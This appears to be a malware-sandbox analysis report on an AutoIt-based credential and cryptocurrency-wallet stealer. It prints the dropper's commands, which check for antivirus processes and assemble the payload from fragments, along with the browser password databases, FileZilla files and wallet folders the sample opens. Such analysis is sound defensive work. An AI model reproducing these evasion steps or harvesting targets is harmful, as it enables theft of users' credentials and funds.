Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 13_2_009BA087
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 13_2_009BA1E2
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 13_2_009AE472
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 13_2_009BA570
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B66DC FindFirstFileW,FindNextFileW,FindClose, 13_2_009B66DC
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097C622 FindFirstFileExW, 13_2_0097C622
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 13_2_009B73D4
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B7333 FindFirstFileW,FindClose, 13_2_009B7333
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 13_2_009AD921
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00945FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 13_2_00945FC8
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\634977 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\634977\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: Web Data.26.dr Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: chrome.exe, 00000013.00000002.2818774004.0000203400B04000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: outlook.office.comVMware20,11696508427s
Source: Web Data.26.dr Binary or memory string: discord.comVMware20,11696508427f
Source: Web Data.26.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: Web Data.26.dr Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: Web Data.26.dr Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: chrome.exe, 00000013.00000002.2823694505.0000203400F54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mousery
Source: chrome.exe, 00000013.00000002.2813940092.0000203400290000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=cde3eea9-2317-48e2-99d7-7e8d0326b177
Source: Web Data.26.dr Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: chrome.exe, 00000013.00000002.2809981784.0000027B6E610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: Web Data.26.dr Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Web Data.26.dr Binary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
Source: msedge.exe, 00000018.00000003.2870259455.00004D9402538000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: chrome.exe, 00000013.00000002.2809981784.0000027B6E610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\o
Source: Web Data.26.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: Web Data.26.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: Web Data.26.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: chrome.exe, 00000013.00000002.2808887512.0000027B6AB28000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.2887879375.000001A338851000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Web Data.26.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: Web Data.26.dr Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: Web Data.26.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: Web Data.26.dr Binary or memory string: tasks.office.comVMware20,11696508427o
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: chrome.exe, 00000013.00000002.2809981784.0000027B6E610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: Web Data.26.dr Binary or memory string: global block list test formVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: dev.azure.comVMware20,11696508427j
Source: Web Data.26.dr Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: Web Data.26.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: Web Data.26.dr Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW\$
Source: Web Data.26.dr Binary or memory string: AMC password management pageVMware20,11696508427
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpv
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BF4FF BlockInput, 13_2_009BF4FF
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0094338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 13_2_0094338B
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00965058 mov eax, dword ptr fs:[00000030h] 13_2_00965058
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree, 13_2_009A20AA
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00972992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00972992
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00960BAF
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960D45 SetUnhandledExceptionFilter, 13_2_00960D45
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00960F91

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: Surrey.com PID: 2864, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 13_2_009A1B4D
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0094338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 13_2_0094338B
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009ABBED SendInput,keybd_event, 13_2_009ABBED
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AEC9E mouse_event, 13_2_009AEC9E
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 634977 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Gtk Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Constitution" Wagon Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Surrey.com Q Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 13_2_009A14AE
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 13_2_009A1FB0
Source: Surrey.com, 0000000D.00000000.2391915618.0000000000A03000.00000002.00000001.01000000.00000007.sdmp, Nec.9.dr, Surrey.com.2.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Surrey.com Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960A08 cpuid 13_2_00960A08
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0099E5F4 GetLocalTime, 13_2_0099E5F4
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0099E652 GetUserNameW, 13_2_0099E652
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 13_2_0097BCD2
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805

Stealing of Sensitive Information

barindex
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 13.2.Surrey.com.43e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Surrey.com PID: 2864, type: MEMORYSTR
Source: Surrey.com, 0000000D.00000002.3577995896.00000000015C4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *electrum*.*
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: Surrey.com, 0000000D.00000002.3577995896.00000000015C4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *exodus*.*
Source: Surrey.com, 0000000D.00000002.3577995896.00000000015C4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: *ethereum*.*
Source: Surrey.com, 0000000D.00000002.3581492503.00000000018B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MultiDoge
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Surrey.com, 0000000D.00000002.3582252732.00000000019F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\sessionstore-backups\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\saved-telemetry-pings\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\bookmarkbackups\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\crashes\events\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\to-be-removed\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\tmp\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\minidumps\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\events\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\crashes\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\db\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\glean\pending_pings\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\security_state\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ov4x28i2.default\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: Surrey.com Binary or memory string: WIN_81
Source: Surrey.com Binary or memory string: WIN_XP
